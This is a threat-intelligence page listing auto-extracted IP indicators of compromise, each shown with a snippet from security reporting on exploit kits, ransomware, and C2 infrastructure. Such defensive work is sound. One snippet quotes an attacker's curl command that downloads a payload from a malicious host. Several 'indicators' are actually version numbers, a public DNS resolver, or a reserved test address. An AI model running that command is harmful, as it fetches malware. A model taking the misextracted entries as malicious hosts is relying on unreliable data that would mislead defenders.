ZeroHour

Indicators of compromise

306 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
ipv485.93.0.724 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· Aug 17, 2026
ipv485.93.0.813 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 8EITest Campaign Evolution: From Angler EK to Neutrino and Rig
Palo Alto Unit 42
· Aug 17, 2026
ipv4104.193.252.236hechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthiAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4104.193.252.241litigators.esteroscreen[.]com Bedep post-infection traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 -Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4162.244.34.11eroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4185.118.164.42the Afraidgate campaign are shown below. Figure 3: Gate on 185.118.164.42 leads to Angler EK/Bedep/CryptXXX on Friday 2016-04-22. FigAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4192.169.189.167]org 85.25.160.124 port 80 - mcimaildmz.dinnerplate.co[.]uk 192.169.189.167 port 80 - candidulumbestuurlijk.newlandsierrarealestate[.]cAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4192.169.190.97rt 80 - candidulumbestuurlijk.newlandsierrarealestate[.]com 192.169.190.97 port 80 - frageboegen-plletyksin.breastcanceroutreach[.]comAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4207.182.148.92bloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4209.126.120.8.97 port 80 - reikleivn-azarashi.orlandohomesbydevito[.]com 209.126.120.8 port 80 - litigators.esteroscreen[.]com Bedep post-infectioAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4217.23.6.40mjobrkn3[.]eu (using a VM) CryptXXX post-infection traffic: 217.23.6.40 port 443 (custom encoding)Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv45.199.141.203yfczmludodohkdqnij[.]com (using a VM) Click-fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetiAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv485.25.160.124et.jacquieleebrasil.com[.]br - GET /js/script.js Angler EK: 85.25.160.124 port 80 - bintiye.helpthevets[.]org 85.25.160.124 port 80 -Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv485.25.79.211ici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oqpwldjc.mjobrkn3[.]eu (using a VM) CryptXXX postAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv493.190.141.27fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv495.211.205.218rdinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - reroAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv495.211.205.228traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - yfczmludodohkdqnij[.]com (using a VM) Click-fraudAfraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX
Palo Alto Unit 42
· Aug 17, 2026
ipv4185.117.153.17650.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.117.153.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv4185.118.66.83.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.118.66.83 port 80 - 185.118.66.83 - POST /upload/_dispatch.php DomainAfraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv4185.140.33.76ored[.]top 5.2.72.236 port 80 - yegoxmvzpx.bsuperpink[.]top 185.140.33.76 port 80 - erfxsnvj.mafterred[.]top 185.140.33.76 port 80 -Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv4185.140.33.99rred[.]top 185.140.33.76 port 80 - hxmst.rautumngreen[.]top 185.140.33.99 port 80 - bkhrdfngwg.blueelizabeth[.]top 185.140.33.99 portAfraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv4185.5.250.13554.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.250.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.11Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv4188.166.38.1251 port 80 - start.puterasyawal[.]com - GET /js/addOnLoad.js 188.166.38.125 port 80 - nepal.laderatutors[.]com - GET /rokmediaqueries.jAfraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv446.101.26.161compromise associated with the Afraidgate campaign: Gates: 46.101.26.161 port 80 - leon.stmaryschooldmt[.]com - GET /scripts/jquery.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv45.187.0.137.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.5Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv45.2.72.114.yintored[.]top 5.2.72.236 port 80 - bkubf.bsuperpink[.]top 5.2.72.114 port 80 - iynwzttqd.hautumngreen[.]top 5.2.72.236 port 80 -Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv45.2.72.236zine.polatoglumimarlik[.]com - GET /to_top.js Neutrino EK: 5.2.72.236 port 80 - avukytj.oautumnyellow[.]top 5.2.72.236 port 80 -Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv45.9.253.173rklfdprel.blueelizabeth[.]top Locky post-infection traffic: 5.9.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv477.222.54.20287.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky
Palo Alto Unit 42
· Aug 17, 2026
ipv4207.174.0.143timately pointing to a live WsgiDAV-based staging server at 207.174.0.143:8080.” reads the report published by Securonix. “Victims whSMOKE#SCREEN Campaign Abuses ScreenConnect to Give Attackers Remote Control Access
Security Affairs
· Aug 9, 2026
ipv47.0.9.1FMC Software - 7.0 - Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar 7.2 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data
The Hacker News
· Aug 6, 2026
ipv47.2.11.1.1-3.sh.REL.tar 7.2 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar 7.4 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data
The Hacker News
· Aug 6, 2026
ipv47.4.7.1.1-4.sh.REL.tar 7.4 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar 7.6 - Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data
The Hacker News
· Aug 6, 2026
ipv47.6.5.1.1-3.sh.REL.tar 7.6 - Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar 7.7 - Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data
The Hacker News
· Aug 6, 2026
ipv47.7.12.1.1-2.sh.REL.tar 7.7 - Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar 10.0 - Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data
The Hacker News
· Aug 6, 2026
ipv4206.72.242.124shed three IP addresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to block them and chU.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog
Security Affairs
· Aug 5, 2026
ipv4206.72.242.162dresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to block them and check logs for sigU.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog
Security Affairs
· Aug 5, 2026
ipv48.19.75.217ny also published three IP addresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to bU.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog
Security Affairs
· Aug 5, 2026
ipv4104.243.35.63match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to originate from pCl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE
The Hacker News
· Aug 3, 2026
ipv4216.152.148.54compromise (IoCs), all of which match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emaCl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE
The Hacker News
· Aug 3, 2026
ipv4216.152.151.204s), all of which match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to orCl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE
The Hacker News
· Aug 3, 2026
ipv45.180.41.35hared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to originate from previously coCl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE
The Hacker News
· Aug 3, 2026
ipv46.1.7.10h 8.0.5, and Rails 8.1.0 through 8.1.3. Rails 6.0.0 through 6.1.7.10 releases are affected only when Active Storage is configureCritical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads
The Hacker News
· Jul 31, 2026
ipv47.2.3.1tt Security list the affected ranges as Rails 7.0.0 through 7.2.3.1, Rails 8.0.0 through 8.0.5, and Rails 8.1.0 through 8.1.3.Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads
The Hacker News
· Jul 31, 2026
ipv47.2.3.2no backport, so affected applications must upgrade to Rails 7.2.3.2 or later. Operators should upgrade to Rails 7.2.3.2, 8.0.5.Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads
The Hacker News
· Jul 31, 2026
ipv48.0.5.1.2.3.2 or later. Operators should upgrade to Rails 7.2.3.2, 8.0.5.1, or 8.1.3.1 and rotate every secret readable by the applicaCritical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads
The Hacker News
· Jul 31, 2026
ipv48.1.3.1ter. Operators should upgrade to Rails 7.2.3.2, 8.0.5.1, or 8.1.3.1 and rotate every secret readable by the application processCritical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads
The Hacker News
· Jul 31, 2026
ipv41.1.4.4Internet & Security Agency (KISA) says AnySign4PC versions 1.1.4.4 through 1.1.4.6 are affected and lists version 1.1.5.0 as tHackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts
The Hacker News
· Jul 30, 2026
ipv41.1.4.6rity Agency (KISA) says AnySign4PC versions 1.1.4.4 through 1.1.4.6 are affected and lists version 1.1.5.0 as the fixed releaseHackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts
The Hacker News
· Jul 30, 2026
ipv47.0.9.1ease Hot Fix Name 7.0 Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar 7.2 Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog
Security Affairs
· Jul 30, 2026
ipv47.2.11.1.9.1-3.sh.REL.tar 7.2 Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar 7.4 Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog
Security Affairs
· Jul 30, 2026
ipv47.4.7.111.1-4.sh.REL.tar 7.4 Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar 7.6 Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog
Security Affairs
· Jul 30, 2026
ipv47.6.5.1.7.1-3.sh.REL.tar 7.6 Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar 7.7 Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog
Security Affairs
· Jul 30, 2026
ipv47.7.12.1.5.1-2.sh.REL.tar 7.7 Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar 10.0 Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10.0U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog
Security Affairs
· Jul 30, 2026
ipv4206.72.242.124iew the logs to determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 "If compromise is suspected, operators shoulAttackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv4206.72.242.162determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 "If compromise is suspected, operators should preserve VCOAttackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv45.2.3.14llowing versions are affected - VCO 5.2.x releases prior to 5.2.3.14 VCO 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prioAttackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv46.1.3.4.2.x releases prior to 5.2.3.14 VCO 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prioAttackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv46.4.2.46.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prior to 7.0.0.1 Arista acknowledged thaAttackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv47.0.0.16.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prior to 7.0.0.1 Arista acknowledged that the vulnerability was externally dAttackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv48.19.75.217them and review the logs to determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 "If compromise is suspected,Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw
The Hacker News
· Jul 28, 2026
ipv451.89.204.28ative networking functions, and the command server address, 51.89.204.28 on port 4444, is baked directly into the binary rather thanMedusaHVNC Trojan Creates Hidden Desktops to Hijack Browsers and Steal Data
Security Affairs
· Jul 27, 2026
ipv48.8.8.8people already have. Switching to a hardcoded resolver like 8.8.8.8 doesn’t save you, because the query still leaves the laptopHackers Hijack Hotel Wi
Security Affairs
· Jul 26, 2026
ipv4104.194.9.14.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 21CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4104.243.35.131associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.2CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4104.243.35.63185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command-and-control address) Web shelCISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4172.111.38.31icators of compromise (IoCs) associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4185.227.83.236.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4209.222.98.445.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4216.152.148.54promise (IoCs) associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4216.152.151.20414 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command-and-control addCISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv438.60.157.212/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker commandCISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv45.180.41.35- 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 7CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv474.50.76.146the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv478.128.113.105 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (AtCISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue
The Hacker News
· Jul 25, 2026
ipv4172.86.126.18this traffic will pass through undetected. curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi The propeChaos ransomware's msaRAT: Living off the browser to build a covert C2 channel
Cisco Talos
· Jul 23, 2026
ipv482.114.160.93itional Netsweeper devices on YemenNet on two IP addresses: 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 wYemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet
Recorded Future
· Jul 16, 2026
ipv482.114.160.98: 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 was still up at the time of this analysis. The re-emergenceYemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet
Recorded Future
· Jul 16, 2026
ipv4179.43.166.242eporting component. The Info.plist contains the C2 address, 179.43.166.242, hardcoded as an App Transport Security exception, visibleCrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper
Security Affairs
· Jul 14, 2026
ipv42.9.99.5s here. Treat the Joomla JCE flaw (CVE-2026-48907, fixed in 2.9.99.5) as urgent too, since it is a maximum-severity and on CISA'Exposed Hacker Server Reveals WP-SHELLSTORM Backdooring Thousands of WordPress Sites
The Hacker News
· Jul 10, 2026
ipv4159.198.41.140ves the second-stage payload. C2 infrastructure resolves to 159.198.41.140, with tunneling routed through 159.198.32[.]222, and the doAI-Generated Malware Powers New Armored Likho APT Campaign
Security Affairs
· Jul 7, 2026
ipv41.2.0.14mpacts multiple versions of the firmware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE UCERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware
The Hacker News
· Jul 7, 2026
ipv415.03.06.46_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware
The Hacker News
· Jul 7, 2026
ipv415.03.06.48N_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoorCERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware
The Hacker News
· Jul 7, 2026
ipv415.03.06.51TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoor functionality is present within the "lCERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware
The Hacker News
· Jul 7, 2026
ipv415.11.0.5mware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE0CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware
The Hacker News
· Jul 7, 2026
ipv462.182.81.38likely backend server for the Kairos leak site resolving to 62.182.81.38, hosted on Virtual Systems LLC in Ukraine, an ASN that hasU.S. Government Agency Paid $1M to Data Extortion Group Kairos
Security Affairs
· Jul 4, 2026
ipv445.148.10.212. Six IP addresses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials
Security Affairs
· Jul 4, 2026
ipv483.142.209.11CVE-2025-55182 . Six IP addresses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials
Security Affairs
· Jul 4, 2026
ipv483.142.209.194ses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indiFBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials
Security Affairs
· Jul 4, 2026
ipv483.142.209.203e indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indicator set also iFBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials
Security Affairs
· Jul 4, 2026
ipv494.154.172.43.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indicator set also includes 27 fileFBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials
Security Affairs
· Jul 4, 2026
ipv4192.0.2.1worth 35 points makes an asynchronous connection attempt to 192.0.2.1, an IP address reserved for testing that should never respoRustDuck: The Botnet That's Still Small but Engineering Like It Plans to Grow
Security Affairs
· Jul 1, 2026
ipv420.12.7.1Catalyst SD-WAN - 20.9.9.1 and earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (FixCisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026
ipv420.12.7.2earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and eCisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026
ipv420.15.4.4xed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (FixCisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026
ipv420.15.4.5arlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (FixedCisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026
ipv420.15.5.2ed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.Cisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026
ipv420.15.5.3arlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed iCisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026
ipv420.18.3.10.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed in 26.1.1.2) Found this articlCisco Catalyst SD-WAN Manager CVE-2026
The Hacker News
· Jun 25, 2026

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.